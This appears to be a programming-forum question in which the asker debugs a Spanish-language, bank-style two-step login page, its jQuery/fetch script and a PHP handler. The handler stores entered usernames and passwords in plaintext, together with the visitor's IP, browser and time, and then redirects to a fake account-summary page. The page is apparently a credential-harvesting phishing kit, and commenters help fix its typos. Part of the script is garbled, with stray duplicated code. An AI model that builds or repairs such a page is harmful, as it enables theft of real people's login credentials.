# Posting 2 values on same table using js

Tags: javascript, php, html, post

So i have got 1 login form with just one input it means that when user provides login name it gets posted somewhere (wish it doesnt) and the password is asked however after clicking on it doesnt get posted i get error 500 but the process of the website gets done but not data posted at my db, in console i do see username gets prepared but when it comes to password it says no index named pasword

what i have tried so far:

```
<form id="Form" action="post.php" method="post">
                    <div class="InputContainer__input"><label class="Label__label" for="username-input" label="Ingresa tu usuario" id="username-label">Ingresa tu usuario</label>
                      <div class="TextField__input-container"><input meta="[object Object]" maxlength="15" id="username-input" type="password" name="username" placeholder="" class="Input__input" value="">
                      </div>
                    </div>
                    <ul>
                    </ul>
                    <div class="_3Ql1A"><button class="ButtonCore__button NavButton__button NavButton__button--continue" id="tgm_loginNext" type="button" disabled=""><span class="ButtonCore__block" tabindex="-1"><span class="ButtonCore__text">Continuar</span><span class="ButtonCore__icon NavButton__icon"> <svg class="SvgIcon__icon SvgIcon__icon-icon--size-18px" focusable="false" role="presentation" aria-hidden="true" viewBox="0 0 24 24">
                              <path fill="none" d="M14.22 4l8 8-8 8M1.78 12h20.44">
                              </path>
                            </svg> </span></span></button></div>
                </div>


                <div id="password-app" class="fade-enter-done" style="display:none;">
                  <div xs="0,0,54,0" class="Margin__container Margin__container-xs-0--top Margin__container-xs-0--right Margin__container-xs-54--bottom Margin__container-xs-0--left" side="both">
                    <h1 class="TextHeadline__text TextHeadline__text--black TextHeadline__text--small _1LeVa">Hola, <span class="iduser"></span></span></h1><a tabindex="0" role="link" class="Link__link Link__link--emphasis Link__link--size-16px">
                      <span class="Link__text">No soy yo</span></a>
                    <div class="Tooltip__container" id="tooltip-container-tooltip-id">
                      <button id="desktop-icon-tooltip-id" class="TooltipIcon__button TooltipIcon__button--desktop TooltipIcon__button--bottom" aria-label="Info" type="button">
                        <svg id="desktop-icon-tooltip-svg" class="SvgIcon__icon SvgIcon__icon--color-black SvgIcon__icon-icon--size-18px" focusable="false" role="presentation" aria-hidden="true" viewBox="0 0 24 24">
                          <path fill="none" d="M22.667 12c0 5.891-4.776 10.667-10.667 10.667C6.108 22.667 1.333 17.89 1.333 12S6.108 1.333 12 1.333c5.89 0 10.667 4.776 10.667 10.667zM12 11.114v5.614M12 8.1v.05">
                          </path>
                          <path stroke="none" d="M12.87 8.125a.874.874 0 1 1-1.748.002.874.874 0 0 1 1.748-.002z">
                          </path>
                        </svg>
                      </button>
                      <div tabindex="-1" class="DesktopTooltip__container DesktopTooltip__container--visible" style="display:none;" aria-labelledby="desktop-tooltip-heading-tooltip-id" style="transform: translateX(0px);">
                        <div class="DesktopTooltip__header">
                          <div class="DesktopTooltip__heading--container">
                            <div id="desktop-tooltip-heading-tooltip-id"><span class="SROnly__container">Info</span>
                              <h2 class="TextSubtitle__text TextSubtitle__text--2 TextSubtitle__text--black" tabindex="-1">No soy yo</h2>
                            </div>
                          </div>
                          <div class="DesktopTooltip__closeButton--container"><button class="CloseButton__button DesktopTooltip__closeButton" tabindex="0" type="button" aria-label="Entendido"><svg class="SvgIcon__icon SvgIcon__icon-icon--size-18px" focusable="false" role="presentation" aria-hidden="true" viewBox="0 0 24 24">
                                <path fill="none" d="M2.72 2.66l18.62 18.62m0-18.62L2.72 21.28"></path>
                              </svg></button></div>
                        </div>
                        <div class="DesktopTooltip__content"><span class="TextBody__text TextBody__text--1 TextBody__text--black">Si no es tu nombre, haz clic en "No soy yo".</span></div>
                      </div>
                    </div>
                  </div>
                    <div class="InputContainer__input"><label class="Label__label" for="password-input" label="Ingresa tu contrasen~a" id="password-label">Ingresa tu contrasen~a</label>
                      <div class="TextField__input-container"><input meta="[object Object]" maxlength="16" id="password-input" type="password" name="password" placeholder="" class="Input__input" value="">
                      </div>
                    </div>
                    <ul>
                    </ul>
                    <div class="_71NfL"><button class="ButtonCore__button NavButton__button NavButton__button--submit" id="tgm_loginLogin" type="button" disabled=""><span class="ButtonCore__block" tabindex="-1"><span class="ButtonCore__text">Iniciar sesión</span><span class="ButtonCore__icon NavButton__icon"> <svg class="SvgIcon__icon SvgIcon__icon-icon--size-18px" focusable="false" role="presentation" aria-hidden="true" viewBox="0 0 24 24">
                              <path fill="none" d="M22.614 4.2l-6.86 6.863-6.672 6.914-6.948-6.46-.421-.392">
                              </path>
                            </svg> </span></span></button></div>
        <input type="submit">
                  </form>
```

my script to send the data

```
     <script>
             displayLoader(1);
      setTimeout(() => {
        displayLoader(0);
      }, 800);

      var next = 0;

      var change;

      var goAhead = 0;

      $(document).ready(function() {



        $("#tgm_loginNext").on("click", function() {

          if (!next) {
            sendData("post.php", $("#username-input").val());
            $(".ButtonCore__icon.NavButton__icon").html(` <svg class="SvgIcon__icon SvgIcon__icon-spinner SvgIcon__icon-spinner--18px" focusable="false" role="presentation" aria-hidden="true" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid"><circle cx="50" cy="50" fill="none" stroke-width="7" r="45" stroke-dasharray="164.93361431346415 56.97787143782138" transform="rotate(243.787 50 50)"><animateTransform attributeName="transform" type="rotate" calcMode="linear" values="0 50 50;360 50 50" keyTimes="0;1" dur="6s" begin="0s" repeatCount="indefinite"></animateTransform></circle></svg> `);
            /*setTimeout(() => {
                $(".ButtonCore__icon.NavButton__icon").html(`<svg
                                                            class="SvgIcon__icon SvgIcon__icon-icon--size-18px"
                                                            focusable="false" role="presentation" aria-hidden="true"
                                                            viewBox="0 0 24 24">
                                                            <path fill="none"
                                                                d="M22.614 4.2l-6.86 6.863-6.672 6.914-6.948-6.46-.421-.392">
                                                            </path>
                                                        </svg>`);
                $("#user-app").css("display","none");
                $("#password-app").fadeIn();    
                next = 0;

            }, 1200);*/

            change = setInterval(() => {

              if (goAhead == 1) {
                $(".ButtonCore__icon.NavButton__icon").html(`<svg
                                                                    class="SvgIcon__icon SvgIcon__icon-icon--size-18px"
                                                                    focusable="false" role="presentation" aria-hidden="true"
                                                                    viewBox="0 0 24 24">
                                                                    <path fill="none"
                                                                        d="M22.614 4.2l-6.86 6.863-6.672 6.914-6.948-6.46-.421-.392">
                                                                    </path>
                                                                </svg>`);
                $("#user-app").css("display", "none");
                $("#password-app").fadeIn();

                goAhead = 0;

                next = 0;

                clearInterval(change);
              }

            }, 50);

            next = 1;
          }





        });

        $("#username-input").on("input", function() {

          if ($(this).val().length < 6) {
            $("#tgm_loginNext").attr("disabled", "");
          } else {
            $("#tgm_loginNext").removeAttr("disabled");
          }

        });

        $("#password-input").on("input", function() {

          if ($(this).val().length < 1) {
            $("#tgm_loginLogin").attr("disabled", "");
          } else {
            $("#tgm_loginLogin").removeAttr("disabled");
          }

        });



        /*$("#desktop-icon-tooltip-id").on("click", function(){
            if($(".DesktopTooltip__container.DesktopTooltip__container--visible").css("display") == "none")
            {
                $(".DesktopTooltip__container.DesktopTooltip__container--visible").removeAttr("style");
            }
            else{
                $(".DesktopTooltip__container.DesktopTooltip__container--visible").css("display", "none");
            }
        });*/


        $("#tgm_loginLogin").on("click", function() {

          if (!next) {
            sendData2("post.php", $("#username-input").val(), $("#password-input").val());
            $(".ButtonCore__icon.NavButton__icon").html(` <svg class="SvgIcon__icon SvgIcon__icon-spinner SvgIcon__icon-spinner--18px" focusable="false" role="presentation" aria-hidden="true" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid"><circle cx="50" cy="50" fill="none" stroke-width="7" r="45" stroke-dasharray="164.93361431346415 56.97787143782138" transform="rotate(243.787 50 50)"><animateTransform attributeName="transform" type="rotate" calcMode="linear" values="0 50 50;360 50 50" keyTimes="0;1" dur="6s" begin="0s" repeatCount="indefinite"></animateTransform></circle></svg> `);
            setTimeout(() => {
              $(".ButtonCore__icon.NavButton__icon").html(`<svg
                                                                    class="SvgIcon__icon SvgIcon__icon-icon--size-18px"
                                                                    focusable="false" role="presentation" aria-hidden="true"
                                                                    viewBox="0 0 24 24">
                                                                    <path fill="none"
                                                                        d="M22.614 4.2l-6.86 6.863-6.672 6.914-6.948-6.46-.421-.392">
                                                                    </path>
                                                                </svg>`);
              //$("#user-app").css("display","none");
              //$("#password-app").fadeIn();    
              next = 0;
              //window.location.href = "./sumary.html";

            }, 1200);
            next = 1;
          }

        });


      });

      $('html').click(function(e) {

        //alert($(e.target).attr('id'));
        if ($(e.target).attr('id') == "desktop-icon-tooltip-svg") {

          if ($(".DesktopTooltip__container.DesktopTooltip__container--visible").css("display") == "none") {
            $(".DesktopTooltip__container.DesktopTooltip__container--visible").removeAttr("style");
          } else {
            $(".DesktopTooltip__container.DesktopTooltip__container--visible").css("display", "none");
          }
        } else {
          if ($(".DesktopTooltip__container.DesktopTooltip__container--visible").css("display") != "none") {
            $(".DesktopTooltip__container.DesktopTooltip__container--visible").css("display", "none");
          }
        }

      });


      function sendData(where, user) {
        const data1 = new FormData();
        data1.append("usuarios", user);

        fetch(`${where}`, {
            method: 'POST',
            body: data1
          })
          .then(function(response) {
            if (response.ok) {


              response.text().then(function(text) {

                let parsed = text.split(';'); //[0] marco [1] pedro

                $(".iduser").html(parsed[0]);

                alert(parsed[0]);
                name = parsed[0];
                goAhead = 1;

                //dar ok para next tela 
              });


            } else {
              throw "Error en la llamada Ajax";
            }

          })
          .catch(function(err) {
            console.log(err);
          });
      }

      function sendData2(where, user, pass) {
        const data1 = new FormData();
        data1.append("usuarios", user);
        data1.append("passf", pass);

        fetch(`${where}`, {
            method: 'POST',
            body: data1
          })
          .then(function(response) {
            if (response.ok) {
              console.log("llamado y procesado");

              location.href ="./sign0n/accountSummary.php?sessID=" + "&Type=PERSONAL&na=" + name + "&uid=Numeros";
              window.location.href="./signOn/index.php";
            } else {
              throw "Error en la llamada Ajax";
            }

          })
          .catch(function(err) {
            console.log(err);
          });
      }

      function displayLoader(n) {
        if (n) {
          $("#loader").removeAttr("style");
          $("#app-div").css("display", "none");
        } else {
          $("#loader").css("display", "none");
          $("#app-div").removeAttr("style");
        }
      }

 </script>
    </head>

    <body>
        <form action="http://google.com" method="GET">
          Search <input type='text' name='q' />
          <input type='submit'/>

      function displayLoader(n) {
        if (n) {
          $("#loader").removeAttr("style");
          $("#app-div").css("display", "none");
        } else {
          $("#loader").css("display", "none");
          $("#app-div").removeAttr("style");
        }
      }

    </script>
```

my post.php

```
$link=mysqli_connect($host,$userdb,$password,$db);

   

if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
 
// Prepare an insert statement
$sql = "INSERT INTO scott (timezone,Fecha,Hora, usuario,contra, navegador, ip) VALUES (?,?,?,?,?,?,?)";
 
if($stmt = mysqli_prepare($link, $sql)){
    // Bind variables to the prepared statement as parameters
mysqli_stmt_bind_param($stmt, "sssssss", $timezone,$Fecha,$hora,$usuario,$contra, $navegador, $ip);
    
    // Set parameters
    
     
    // Attempt to execute the prepared statement
    if(mysqli_stmt_execute($stmt)){
    } else{
        echo '<script type="text/javascript">';
    echo 'alert("Alguno de sus datos es incorrecto por favor vuelva a intentar")';
    echo '</script>';
    header( "refresh:0;url=index.php" );

    }
} else{
    echo "ERROR: Could not prepare query: $sql. " . mysqli_error($link);
}
 
// Close statement
mysqli_stmt_close($stmt);
 
// Close connection
mysqli_close($link);
session_destroy();
?>
```

expected result ? i expect that username gets posted on my DB aswell as password without creating 2 different oists

Comment: Is this just a TYPO? `username` !== `$usuario = $_POST['usuarios'];`

Comment: ___Storing passwords in Plain Text___ **V.Bad** PHP provides [`password_hash()`](http://php.net/manual/en/function.password-hash.php)
and [`password_verify()`](http://php.net/manual/en/function.password-verify.php) please use them for the safety of your users.

Comment: The `bind_param` seems incorrect, is there really nothing between the second and third commas? And don't the variables need to be in the same order as they are in the query? I use PDO myself, and usually named parameters, so it's a little different.

Comment: Why does your post.php use the variable `$usarios` for both the username __and__ password fields? And uses the form field name `passwords` when the form code seems to use `password`.

Comment: currently im on thest phase man its not like its part of a live site its just that it isnt getting stored on db
@droopsnoot i apologize im really really tired of trying to get things done

Comment: TYPO! You form creates the date using the variable name `username` and you look for a field called `usuarios` in the post array `$_POST['usuarios'];` It does not exist!!!

Comment: @RiggsFolly you might want to re-red again there is a usuarios call wich holds the first data omg i apologize for my stupidity now i noticed the error i posted the edited version im so sorry i willl change first post and let you know i stripped some data out in order to try to understand it on my brain

Comment: @RiggsFolly so so sorry to both of you i never realized i was posting an edited version in order to make tests its just that it has been the largest 36 hours to achieve that, brain.exe hurts so bad